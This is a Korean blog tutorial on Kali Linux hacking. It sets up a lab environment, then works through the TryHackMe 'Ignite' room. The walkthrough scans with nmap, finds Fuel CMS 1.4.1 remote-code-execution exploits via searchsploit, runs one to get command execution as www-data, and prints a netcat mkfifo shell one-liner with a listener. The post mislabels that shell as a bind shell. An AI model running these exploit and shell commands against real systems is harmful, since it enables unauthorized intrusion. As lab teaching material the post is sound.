IT/Kali_Linux Hacking

해킹 IP 주소만 알아도 기본적인 공격가능

나령 윤기도 2023. 8. 28.

 
 

해킹학습에 입문을 할려면 필수 프로그램 2가지가 있습니다.
나와 잘 어울리는 VirtualBox
그리고 또 한가지 vmware 가 필수 이다.
프로그램을 거치지 않고 어설프게 해킹 시도를 하게되면 

 
접근권한이 없는 정보 통신망
 현행 '정보통신망 이용촉진 및 정보보호 등에 관한 법률'은 정당한 접근권한이 없거나 허용된 접근권한의 범위를 초과하여 정보통신망에 침입하는 행위를 금지합니다.. 이를 위반하면 3년 이하의 징역 또는 3000만원 이하의 벌금에 처하게 됩니다.
 
정보통신기반보호법
 정보통신기반보호법에서도 주요 정보통신기반시설을 침해하여 교란 · 마비 또는 파괴한 자는 10년 이하의 징역 또는 1억원 이하의 벌금에 처하도록 규정하고 있습니다. 또 형법에서도 컴퓨터 등 정보처리장치에 허위의  정보 또는 부정한 명령을 입력하거나 그빡의 방법으로 정보처리에 장애를 발생하게 한 자는 업무방해죄로 5년 이하의 징역 또는 1500만 원 이하의 벌금에 처하도록 규정하고 있습니다.

해킹 기본셋팅 방법

1. Virtualbox  : https://download.virtualbox.org/virtualbox/7.0.10/VirtualBox-7.0.10-158379-Win.exe 다운로드
2. kali linux virtualbox-amd64 용 다운로드  :  https://cdimage.kali.org/kali-2023.3/kali-linux-2023.3-virtualbox-amd64.7z


3. 압축 프로그램 반디집을 추천   :   https://kr.bandisoft.com/bandizip/dl.php?std-all 



Kali linux 설치후 기본작업


~# apt-get update

~# apt-get install fcitx-hangul

~# apt-get install fcitx-lib*

~# apt-get install fonts-nanum*

Application --- Setting  ---  Input Method  OK , YES, fcite 체크 후 OK
Application --- Setting  ---  Fcitx Configuration  + 클릭  Only Show CurrentLanguage 체크해제(****아주 중요함) 후                         Hangul 입력 
                                                                 Hangul 선택 후 Global Config 클릭      Tirgger Input Method  Ctrl Space 선택확인
그럼 한글 입력 끝
 한 번 Ctrl Space  한글
 또 한 번  Ctrl Space 영문 으로 변경됨


크롬 설치

sudo apt install wget (최신버전은 이미 설치되어 있음)
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome-stable_current_amd64.deb
sudo apt-get install -f(설치과정시 에러가 날때)
sudo google-chrome --no-sandbox
Application ---All Application  ---google chrome  New Windows 클릭 



 https://tryhackme.com/
로그인 이 없으면 기존 구글 계정으로 로그인
프로필 아이콘 클릭 Access 클릭
download your configuration file 다운로드를 받는다.
터미널창을 클릭 한후 cd Downloads/ 로 들어간다
openvpn (다운받은 파일 입력)syskido82.ovpn 엔터
설치중에 에러가 발생하면 
화면에 openfold 창으로 들어가 Downloads 폴드로 가면 다운로드받은 파일 클릭하면
14번째줄에다가  --data-cipher[s]    --data s를 추가해주고 저장 한 후 
다시 실행하면 정상적으로 설치가 된다.
그리고 새로운 터미널을 열어 ifconfig 라고 입력하면 새로 추가된 항목 tun0 [inet 10.18.33.193] 각자 다른 ip

https://tryhackme.com/사이트 들어와서
learn 아이콘 클릭  Search 클릭 Show 에서 Free only 변경후 
lgnite 검색 클릭  Start Machine 클릭 하면 1분후에 가상 IP를 볼 수 있음  IP Address 10.10.242.12

정보수집[IP:10.10.242.12]

IP주소 : 인터넷상의 컴퓨터 주소
포트번호 : 프로세스가 연결
1234 - 카카오톡  
포트 스캔 : 공격을 하기 위해서는 열려있는 포트를 확인해야 한다. [도구 :nmap]
포트 - 프로세스  nmap -sV 10.10.242.12

ls /usr/share/nmap/scripts/
nmap 10.10.242.12 -script http-enum.nse
 

nmap -sV -sC 10.10.242.12 > scan_res
cat scan_res
결과  
┌──(root㉿kali)-[/home/kali]
└─# cat scan_res
Starting Nmap 7.94 (https://nmap.org ) at 2023-08-26 23:41 EDT
Nmap scan report for 10.10.242.12
Host is up (0.33s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/fuel/
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.14 seconds


터미널 창에서
nmap 10.10.242.12 엔터
다음에 wireshark 엔터  tun0 클릭

취약점을 찾는 방법
1.
 ┌──(root㉿kali)-[/home/kali]
 └─# searchsploit Apache/2.4.17

2.

┌──(root㉿kali)-[/home/kali]
└─# searchsploit Fuel CMS 1.4
결과값 
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1)                | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticate | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)      | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authent | php/webapps/48778.txt
---------------------------------------------------------- ---------------------------------
Shellcodes: No Results

3.
RCE(Remote Code Execution)
Code Injection
Command Exxcution

ls -l /usr/share/exploitdb/exploits/linux/webapps/47138.py
find / -name "47138.py" 2> dev/null

┌──(root㉿kali)-[/home/kali]
└─# find / -name "49487.rb" 2> /dev/null
/usr/share/exploitdb/exploits/php/webapps/49487.rb

┌──(root㉿kali)-[/home/kali]
└─# find / -name "50477.py" 2> /dev/null
/usr/share/exploitdb/exploits/php/webapps/50477.py


**** 공격코드를 찾았는데
1. txt -> 파일일때는 취약점을 설명해둔 파일입니다.
2.--> 직접 프로그래밍 / 직접공격
3. py, rb 
4.python2 exploit.py
5.ruby exploit.rb

6. .c  컴파일  , exploit.c
gcc exploit.c -o exploit 로 변환시켜주어야 한다.
언어로 되어 있을때는  컴파일을 해야 된다.


┌──(root㉿kali)-[/home/kali]
└─# cp /usr/share/exploitdb/exploits/linux/webapps/47138.py ./exploit1.py

┌──(root㉿kali)-[/home/kali]
└─# cp /usr/share/exploitdb/exploits/php/webapps/49487.rb ./exploit2.rb

┌──(root㉿kali)-[/home/kali]
└─# cp /usr/share/exploitdb/exploits/php/webapps/50477.py ./exploit3.py

┌──(root㉿kali)-[/home/kali]
└─# ls
Desktop    exploit1.py  google-chrome-stable_current_amd64.deb  Public     Videos
Documents  exploit2.rb  Music                                   scan_res
Downloads  exploit3.py  Pictures                                Templates


┌──(root㉿kali)-[/home/kali]
└─# python3 exploit3.py
usage: python3 exploit3.py -u <url>
                                                                                            
┌──(root㉿kali)-[/home/kali]
└─# python3 exploit3.py -u
usage: python3 exploit3.py -u <url>
exploit3.py: error: argument -u/--url: expected one argument
                                                                                            
┌──(root㉿kali)-[/home/kali]
└─# python3 exploit3.py -u http://10.10.17.209
[+]Connecting...
Enter Command $ls
systemREADME.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt



Enter Command $id
systemuid=33(www-data) gid=33(www-data) groups=33(www-data)


Enter Command $

Bind shall   :  공격자            --->  공격 당하는 컴퓨터    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.17.209  9999 >/tmp/f
9999포트로 공격 들어갑니다.  이것을  Bind shall 이라고 합니다.
누가 공격 들어오면  야 우리집에 9999 포트가 열렸다. 이거 누구냐
*** 이 방법은 공격 들어오는 것을 방화벽이 들어오지 못하도록 끊어버리는 경우가 많아 성공하기가 어렵다.

리버스 쉘(reverse-shell-generlator)  :  공격자가 9999 포트를 열어 우리 시스템의 9999번 포트로 연결하도록 악성코드를 만들고 
   피해자 컴퓨터에서 실행을 한다. 나가는 것을 강화하지는 않는다.  nc -nlvp 9999

┌──(root㉿kali)-[/home/kali]
└─# nc -nlvp 9999         
listening on [any] 9999 ...


 https://www.revshells.com/ 

댓글